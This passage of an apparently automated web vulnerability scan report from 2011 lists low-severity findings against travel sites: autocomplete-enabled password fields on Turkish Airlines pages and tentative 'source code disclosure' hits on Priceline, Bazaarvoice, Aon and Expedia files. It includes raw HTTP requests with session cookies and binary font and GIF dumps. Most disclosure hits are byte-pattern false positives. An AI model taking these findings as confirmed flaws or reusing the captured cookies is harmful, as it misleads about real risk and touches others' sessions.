Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ksso3m55td3pq4almj0x3k45; __utma=1.1413828058.1317599904.1317599904.1317599904.1; __utmb=1.1.10.1317599904; __utmc=1; __utmz=1.1317599904.1.1.utmcsr=manutd.com|utmccn=(referral)|utmcmd=referral|utmcct=/Search-Results.aspx

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 79854


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr
...[SNIP]...
<div class="miles radius-4px shadow-4px">

<form method="post" action="https://www4.thy.com/tkmiles/j_security_check?lang=en">
<input type="hidden" value="TK" id="tk" name="tk">
...[SNIP]...
</span>
<input class="text small input-numeric" type="password" name="j_password" id="j_password" value="" size="6" />
</span>
...[SNIP]...

15.20. http://www.turkishairlines.com/en-CA/quick_search_part.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.turkishairlines.com
Path:   /en-CA/quick_search_part.aspx

Issue detail

The page contains a form whose password field has autocomplete enabled; the form's action URL and the password field are shown in the response extract below.

Request

GET /en-CA/quick_search_part.aspx?p=award HTTP/1.1
Host: www.turkishairlines.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.turkishairlines.com/en-CA/index.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ksso3m55td3pq4almj0x3k45; __utma=1.1413828058.1317599904.1317599904.1317599904.1; __utmb=1.2.10.1317599904; __utmc=1; __utmz=1.1317599904.1.1.utmcsr=manutd.com|utmccn=(referral)|utmcmd=referral|utmcct=/Search-Results.aspx

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:01:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1739

<form id="odulBiletLogin" name="tklogin" action="http://www4.thy.com/troyaonline/mainPageAwardStart.tk?lang=en" method="post">
<input type="hidden" value="TK" name="tk">
...[SNIP]...
</label>
<input style="width:145px;" type="password" class="medium float-left" name="j_password" id="texta2" maxlength="6" />
</div>
...[SNIP]...

16. Source code disclosure
There are 15 instances of this issue:

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.


16.1. http://travela.priceline.com/hotel/js/searchValidation.js

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://travela.priceline.com
Path:   /hotel/js/searchValidation.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /hotel/js/searchValidation.js?v=072511 HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://travela.priceline.com/hotel/searchResults.do?jsk=5463010a5064010a2011100300091519d011589950&key=gtapcnq5&showDP=y&NYOPRedirNI=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=58AA51FFBF9D4E024C54F62C7478894F; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; vsch=v2011100300090989417126%5F98264026; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; JSessionKey=5463010a5064010a2011100300091519d011589950; Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A09%3A15&ID=IGOUGO&PRODUCTID=&SOURCEID=PL; PSessKey=

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:12:20 GMT
Server: Apache
Last-Modified: Thu, 29 Sep 2011 15:53:40 GMT
ETag: "f0072a-6a00-4ae16832b2900"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 27136
Content-Type: text/javascript

var pageType;
function validateSearchFormURL(sURL, sActionAddOn) {
var checkInField = document.getElementById('checkInDate');
var checkOutField = document.getElementById('checkOutDate');

...[SNIP]...
tElementById(errorOuterDiv)) document.getElementById(errorOuterDiv).style.display = "";
       
           //document.getElementById("NewSearch").style.height='320px';
       }
       else{
           
           //var sURL = "http://<%=request.getServerName() + request.getContextPath() + CreateLink.appendSessionKey("/rateSelectionDirect.do",request)%>"+
               //"&checkInDate="+checkInField.value+"&checkOutDate="+checkOutField.value+"&propID="+lightBoxpropID+"&numberOfRooms="+numOfRooms;            
           //var params="&checkInDate="+checkInField.value+"&checkO
...[SNIP]...

16.2. http://travelocity.ugc.bazaarvoice.com/module/0025-en_us/cmn/0025-en_us/display.pkg.js

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://travelocity.ugc.bazaarvoice.com
Path:   /module/0025-en_us/cmn/0025-en_us/display.pkg.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /module/0025-en_us/cmn/0025-en_us/display.pkg.js HTTP/1.1
Host: travelocity.ugc.bazaarvoice.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://travel.travelocity.com/hotel/HotelDetail.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?tab=guide&tripType=hotel&propertyId=4810&airport=BOS&resetReview=true&hotelQKey=-2237575859332798600&tsHotelQKey=-2237575859332798600&reviewPage=reviewStart&locLink=HOTEL.HOTELAVAILABILITYLISTLITE1|NAT1&dr=4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP="Bazaarvoice does not have a P3P policy."
Last-Modified: Fri, 30 Sep 2011 14:20:29 GMT
Content-Type: text/javascript;charset=utf-8
Vary: Accept-Encoding
Content-Length: 126517
Cache-Control: max-age=478
Expires: Mon, 03 Oct 2011 00:19:09 GMT
Date: Mon, 03 Oct 2011 00:11:11 GMT
Connection: close

$BV.Internal.define("jquery.effects.core",[document],["jquery.core"],function(a,b){
/*
* jQuery UI Effects 1.8.6
*
* Copyright 2010, AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under t
...[SNIP]...
<H;E++){G.call(F,E)}};C.mixin=function(E){d(C.functions(E),function(F){q(F,C[F]=E[F])})};var k=0;C.uniqueId=function(E){var F=k++;return E?E+F:F};C.templateSettings={evaluate:/<%([\s\S]+?)%>/g,interpolate:/<%=([\s\S]+?)%>/g};C.template=function(H,G){var I=C.templateSettings;var E="var __p=[],print=function(){__p.push.apply(__p,arguments);};with(obj||{}){__p.push('"+H.replace(/\\/g,"\\\\").replace(/'/g,"\\'").replace(I.
...[SNIP]...

16.3. http://www.aon.com/manchesterunited/vagroundedstd-light-webfont.ttf

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.aon.com
Path:   /manchesterunited/vagroundedstd-light-webfont.ttf

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /manchesterunited/vagroundedstd-light-webfont.ttf HTTP/1.1
Host: www.aon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.aon.com/manchesterunited/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FDA5F4B4BB1AB049D12027B006BB7DA5; s_pers=%20gpv_pageName%3D/manchesterunited/%7C1317601722252%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"55356-1314119279000"
Last-Modified: Tue, 23 Aug 2011 17:07:59 GMT
Content-Length: 55356
Date: Sun, 02 Oct 2011 23:59:12 GMT

...[binary TrueType font data (tables BASE, FFTM, GDEF, GPOS, GSUB, OS/2, cmap, cvt, fpgm, gasp, glyf, head); the scanner's "ASP source" match is the literal byte sequence "<%" occurring inside the font data, which is why the finding is marked Tentative]...
..
..................+
..................8..W..+.........+.....+.... . .#....9..9.@    ..
................@    ..
................@...01....#"&547.62......"&'.,..
.......:.... ...v....... .8)).. ....................../......+......+.../.    .+.01.!"43!2..........}22......_.......S.../......+.../...+..    .    .+...+.6........+
............    ......    .........    .....@...01.'&54632......#".s#....s#....h/....    /.........#.........!.X.....+..3........+..3.!...."/.....    .......+...22..    ..#.+........99..!....    ..$.9.....901....#"&=.#.#"&4632.354632....264&".......8Yl~~lPA.......H.HH....6....%P...G......vv.v......>...    .......o.....+..3........+....+...... /.....    ...2..    .?.+......+..    ..!.+........99..........$.9........9......99.....901...264&"..462...3>.32..."'#..."&.H.HH...(...J0h{{.&..(..X.vv.v.[.........+...I..........#.........S.....+.......
+....    +....+.......
+...        +.../.....    ....
+....    +..2...+.........990164632....#"&#"...32632...#"#}sAN...<!KMMK#=
"L@s...'....w.w.%.*...#...........w.....+..3........+....+...... /.....    .......+..2..    ......    .?.+../.!.+..........$.9........99.......    9.....99......9901$4&"...2.5#."&4632..3.462....."&..H.HH.?.&.{{h0J...(..(...vv.v..I...+........T................!.g.....+........+.........+....<.+.."/.....    ...2......+..    ..#.+.........999......99.......    .99......9901%!..32>.32....#"&54632....%!4&#&.....UH(A!
..Kx|.lg~....$IDKI.F\....."K.sq..g..B@d.a................W.....+....+............+..3......2.../.....2..    ...2...
+....    +.@..    +...
+.@.
   +. .+.01...."&5.#"4;.546;.2...+."..32.#..(.$,,$B3...0.$7,,...a......L}7<..&#.L....#.(.....$.,.......+.(......+.......
+...
   +....+."3.,....-/....&    ..&..*.+..    .?.+.....    .../..3...+.&....
.99........(+$.9..*..."9..(.....9.,.....999.....901....#"&54632..326=.#.#"&4632..354632....264&"...mE....0F)MD.-Zl~~l(L........H.HH....7v.@!....aC.L...).......vv.v.....:....... .I..
..+..3....+....+......!/.....    ...2......+..    ..".+.......9.........9901%.4&"....."&5.462....632......"&..JbJ.(..(..7\!>8".(.)."ABBA..............F.-Q6.........0...........Q.....+....+......+.
..+.../....    ...+..    ...+....+..    .../..    ....+..........$.9.01...."&5.462.&462..."..(..(.b , ,...>.........., , ......0.(.........O.....+......+.
..+../.../....    ...+..    ...+....+..    .../..    ....+..........$.9.01...."&5.462.&462..."..(..(.b , ,...l.........., , ....:...............+..3....+.
..+.../.....    ...2. .+.6..'.....+
.................
.t..+
.................................................@...017.462...7632.........."&/...."&:.(................(.)................................:.........!.....+.
..+.../.....    ...    ...+.01...."&5.462...(..(....T.............:.......4.i.....+.%233....+...33.....,2..5/....    ...2......+.0    ..0..(.+.#    ..6.+.......9.0...9.(...9........9.....901%.4&#"....."&5.462....>.32.632......"&5.4&#"....."&.u<65<.(..(....:%]5?d!>8".(.<65<.(.).*9BB9.................ZZ.-Q6.......*9BB9........:....... .E.....+..3.
..+..3......!/.....    ...2......+..    ..".+......
9..
.....9017.462....632......"&5.4&"....."&:.(..7\!>8".(.JbJ.(.)........F.-Q6......."ABBA..........#...........J.....+........+......./....        ..    ...+..    ....+.    .......$.9...........$.9016462..."...264&"#~.~~.&H.HH........^.vv.v....>.(.    .......o.....+........+..3....../.. /.....    ...2..    .?.+......+..    ..!.+........99..........$.9.........99......99.....901...264&"..462...362...#"&'#..."&.H.HH...(..&.{{h0J...(..X.vv.v.........I...+........#.(.........s.....+........+..3....../.. /.    ...    .......+.2..    ......    .?.+../.!.+........
.$.9........99........9.....    99.....901$4&"...2$462.35462....."&=.#..#"..H.HH...{.&..(..(...J0h..vv.vT..I......l......+....:...=.....=.....+....+..3....+.+.../.....    ...2...
+.@..    +...+........9017.462...3>.32.........."&:.(...D#..7/E.(.)......-#9..&
.IF..................).......+.!...!.
+..!.    +....+.....
+..        +..*/.....    ....
+....    +....$.+..    ..$.
+..$.    +.+.+.6........+
..(..&.............+.(..'(&.+.... . .#....9.'(&..9.....&'(...........&'(.......@....!.....9901.4632....#"..#"........"&5462..32654...mH<u..."4$(5;SS;r.x..,B*.9;SS;..EQ7'....# .(.$?+OUA$..! +..-!%>
.............L.....+../..3......2...
+.@..    +.../.....2.    ...2..
+.@
   +..
+.@..    +...+.01.5462...32.+...."&5.#"43V.(.$,,$.(.$,,..s....sL.a......L.....:.........9.....+.    ......+.3.../.....    .....
.+..    
...[SNIP]...

16.4. http://www.expedia.com/static/default/default/images/hotel-sprite.gif

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.expedia.com
Path:   /static/default/default/images/hotel-sprite.gif

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /static/default/default/images/hotel-sprite.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"22991-1317085621866"
Last-Modified: Tue, 27 Sep 2011 01:07:01 GMT
Content-Length: 22991
Date: Mon, 03 Oct 2011 00:10:23 GMT
Connection: close

GIF89a*.&....)........r..M.."w.$z.......W..M........F..7v.5......................3..............2..3.............5_..............E....q....................f.%~.....n.....Oy............................
...[SNIP]...
.......0Y.........O......`....[p....=F...h..r....6|..y!..6_....E..0d....C..q.b..."....N.........`...I.........p.b..>f....:q.......................o..........t...i............3f.........!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 ">
...[SNIP]...
</x:xmpmeta> <?xpacket end="r"?>.................................................................................................................................~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONMLKJIHGFEDCBA@?>
...[SNIP]...

16.5. http://www.expedia.com/static/default/default/images/infosite/bg_button_b.gif

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.expedia.com
Path:   /static/default/default/images/infosite/bg_button_b.gif

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /static/default/default/images/infosite/bg_button_b.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information?chkin=10%2F04%2F2011&chkout=10%2F07%2F2011&rm1=a1&hwrqCacheKey=ccf4a420-af8b-480f-8413-efb42e880287HWRQ&hashTag=roomsAndRates&rfrr=-5517&c=d20f4232-e339-420a-bcb4-97cad88f9b0f&&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=0; MediaCookie=0`1034,1004,PDEST,BOS; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"1127-1317085582989"
Last-Modified: Tue, 27 Sep 2011 01:06:22 GMT
Content-Length: 1127
Date: Mon, 03 Oct 2011 00:13:12 GMT
Connection: close

GIF89a........f..........!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 ">
...[SNIP]...
</x:xmpmeta> <?xpacket end="r"?>.................................................................................................................................~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONMLKJIHGFEDCBA@?>
...[SNIP]...

16.6. http://www.expedia.com/static/default/default/images/infosite/bg_button_span_b.gif

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.expedia.com
Path:   /static/default/default/images/infosite/bg_button_span_b.gif

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /static/default/default/images/infosite/bg_button_span_b.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information?chkin=10%2F04%2F2011&chkout=10%2F07%2F2011&rm1=a1&hwrqCacheKey=ccf4a420-af8b-480f-8413-efb42e880287HWRQ&hashTag=roomsAndRates&rfrr=-5517&c=d20f4232-e339-420a-bcb4-97cad88f9b0f&&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=0; MediaCookie=0`1034,1004,PDEST,BOS; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"1216-1317085591679"
Last-Modified: Tue, 27 Sep 2011 01:06:31 GMT
Content-Length: 1216
Date: Mon, 03 Oct 2011 00:13:11 GMT
Connection: close

GIF89a........f..........!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 ">
...[SNIP]...
</x:xmpmeta> <?xpacket end="r"?>.................................................................................................................................~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONMLKJIHGFEDCBA@?>
...[SNIP]...

16.7. http://www.expedia.com/static/default/default/images/infosite/button_beak_b.gif

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.expedia.com
Path:   /static/default/default/images/infosite/button_beak_b.gif

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /static/default/default/images/infosite/button_beak_b.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information?chkin=10%2F04%2F2011&chkout=10%2F07%2F2011&rm1=a1&hwrqCacheKey=ccf4a420-af8b-480f-8413-efb42e880287HWRQ&hashTag=roomsAndRates&rfrr=-5517&c=d20f4232-e339-420a-bcb4-97cad88f9b0f&&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=0; MediaCookie=0`1034,1004,PDEST,BOS; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"1184-1317085588075"
Last-Modified: Tue, 27 Sep 2011 01:06:28 GMT
Content-Length: 1184
Date: Mon, 03 Oct 2011 00:13:12 GMT
Connection: close

GIF89a...........f.......!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 ">
...[SNIP]...
</x:xmpmeta> <?xpacket end="r"?>.................................................................................................................................~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONMLKJIHGFEDCBA@?>
...[SNIP]...

16.8. http://www.expedia.com/static/default/default/images/infosite/rating_bar.gif

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.expedia.com
Path:   /static/default/default/images/infosite/rating_bar.gif

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /static/default/default/images/infosite/rating_bar.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information?chkin=10%2F04%2F2011&chkout=10%2F07%2F2011&rm1=a1&hwrqCacheKey=ccf4a420-af8b-480f-8413-efb42e880287HWRQ&hashTag=roomsAndRates&rfrr=-5517&c=d20f4232-e339-420a-bcb4-97cad88f9b0f&&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=0; MediaCookie=0`1034,1004,PDEST,BOS; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"1348-1317080324131"
Last-Modified: Mon, 26 Sep 2011 23:38:44 GMT
Content-Length: 1348
Date: Mon, 03 Oct 2011 00:13:11 GMT
Connection: close

GIF89ab........9..L.._.._..r..L...........
..'...............!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 ">
...[SNIP]...
</x:xmpmeta> <?xpacket end="r"?>.................................................................................................................................~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONMLKJIHGFEDCBA@?>
...[SNIP]...

16.9. http://www.expedia.com/static/default/default/images/infosite/rooms_left_middle.gif

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.expedia.com
Path:   /static/default/default/images/infosite/rooms_left_middle.gif

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /static/default/default/images/infosite/rooms_left_middle.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information?chkin=10%2F04%2F2011&chkout=10%2F07%2F2011&rm1=a1&hwrqCacheKey=ccf4a420-af8b-480f-8413-efb42e880287HWRQ&hashTag=roomsAndRates&rfrr=-5517&c=d20f4232-e339-420a-bcb4-97cad88f9b0f&&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=0; MediaCookie=0`1034,1004,PDEST,BOS; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"1096-1317080311412"
Last-Modified: Mon, 26 Sep 2011 23:38:31 GMT
Content-Length: 1096
Date: Mon, 03 Oct 2011 00:13:14 GMT
Connection: close

